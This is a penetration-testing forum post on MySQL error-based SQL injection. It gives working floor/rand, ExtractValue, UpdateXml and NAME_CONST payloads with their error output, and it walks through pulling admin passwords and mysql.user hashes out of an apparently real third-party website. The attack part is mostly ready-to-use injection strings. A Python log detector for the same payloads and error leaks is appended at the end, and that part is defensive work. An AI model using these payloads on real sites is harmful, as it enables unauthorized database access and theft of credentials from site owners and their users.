中国网络渗透测试联盟
Title: MySQL error-based injection: exploitation methods for the three error modes floor, ExtractValue and UpdateXml
Author: admin  Time: 2015-11-11 19:03
1. Error-based via floor()
The following payloads can be used:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
Example:
First, run a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement can be used to trigger the error.
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As shown, the MySQL version is successfully leaked through the error message. To retrieve other data, replace the version() call with the desired subquery.
For example, to retrieve the administrator username and password:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))
Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
More collected examples:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
Error: Duplicate column name '5.0.27-community-nt'
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection technique for newer MySQL versions: injection using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the NAME_CONST method. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Background
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
Code:
NAME_CONST(DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1)
|------|
| TEST |
|------|
|    1 |
|------|
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.
Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables
Let's try it out on my site..
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
We should get a duplicate column 1 error...
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
Error: Duplicate column name '1'
Now let's get the tables out this bitch..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here; if it does, we can go on and finish the job.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
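Every technique on this page leaves two traces a defender can check for: a recognisable payload shape in the request (floor(rand(0)*2) under GROUP BY, extractvalue/updatexml wrapping a subquery, the same NAME_CONST constant repeated) and a raw MySQL error string echoed into the HTTP response. The following Python detector is an added example, not part of the original post or of any tool it mentions; the access-log lines are constructed for illustration, and the IPs and paths in them are placeholders.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures of the four error-based techniques shown in the post,
# matched against a URL-decoded, lower-cased, whitespace-collapsed request.
TECHNIQUES = {
    "floor_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by"
        r"|group\s+by.*floor\s*\(\s*rand\s*\(", re.S),
    "extractvalue": re.compile(r"extractvalue\s*\("),
    "updatexml": re.compile(r"updatexml\s*\("),
    # the NAME_CONST trick repeats the same constant to force a duplicate column
    "name_const": re.compile(r"(name_const\s*\(.*){2}", re.S),
}
# Response-side markers: the MySQL errors the post shows being echoed to the browser.
LEAK_MARKERS = ("duplicate entry", "xpath syntax error", "duplicate column name")

def normalize(raw):
    """Decode URL encoding twice ('+' is a space in the post's payloads) and
    collapse whitespace so the regexes see what the SQL parser would see."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(raw))).lower()

def classify_request(raw):
    """Return the set of error-based technique names present in one request."""
    text = normalize(raw)
    return {name for name, rx in TECHNIQUES.items() if rx.search(text)}

def leaks_db_error(body):
    """True if a response body echoes a MySQL error the client should never see."""
    low = body.lower()
    return any(marker in low for marker in LEAK_MARKERS)

def scan_access_log(lines):
    """Return [(line_number, techniques)] for every log line carrying a payload."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = classify_request(line)
        if found:
            hits.append((number, found))
    return hits

# Constructed sample log lines (not real traffic); payload shapes follow the post.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /detail.php?id=330 HTTP/1.1" 200 512',
    '10.0.0.9 - - "GET /detail.php?id=1+and+(select+1+from+(select+count(*),'
    'concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 88',
    '10.0.0.9 - - "GET /detail.php?id=1+and+extractvalue(1,concat(0x5c,(select+user()))) HTTP/1.1" 500 90',
    '10.0.0.9 - - "GET /detail.php?id=1+and+1=(select+*+from+(select+NAME_CONST(version(),1),'
    'NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 95',
]
```

The response-side check (leaks_db_error) is the more durable of the two: payload shapes can be rewritten, but an application that returns raw MySQL errors stays an oracle whatever the payload looks like.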